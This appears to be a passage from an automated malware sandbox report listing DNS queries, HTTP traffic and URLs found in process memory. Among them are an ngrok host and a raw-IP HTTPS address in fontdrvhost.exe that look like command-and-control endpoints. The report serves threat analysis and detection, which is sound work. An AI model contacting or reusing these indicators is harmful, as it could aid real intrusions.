https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Content-Length: 207Content-Type: text/html; charset=utf-8Date: Tue, 17 Dec 2024 11:14:59 GMTServer: Werkzeug/3.0.3 Python/3.12.8Connection: close

Source: powershell.exe, 00000002.00000002.2268647629.0000013D0DC6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app
Source: powershell.exe, 00000002.00000002.2343680999.0000013D25642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 00000004.00000002.2930180764.00000252AA085000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0CFD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://ubi.comd:/dev/assassin-playground/dx10_integration/main/extern/onlineservices/Tracking/Module
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2343680999.0000013D2568C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.ubi.com
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.ubi.com/de
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.ubi.com/es
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.ubi.com/fr
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.ubi.com/it
Source: fontdrvhost.exe	String found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk
Source: fontdrvhost.exe, 00000018.00000002.2510226698.0000000005717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvkkernelbasentdllkernel32GetProcessMitigatio
Source: fontdrvhost.exe, 00000018.00000002.2508989012.0000000002D8C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvkx
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0DC6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0E163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0DC6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0CFD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: msedge.exe, 00000003.00000002.1806884319.000002CC600AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com963
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/J
Source: msedge.exe, 00000003.00000002.1814629935.00004AFC00040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: fontdrvhost.exe, 00000018.00000003.2440367132.0000000005714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: fontdrvhost.exe, 00000018.00000003.2440367132.0000000005714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9E83000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1800129032.00000252A9EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D1F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000004.00000003.1800129032.00000252A9E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
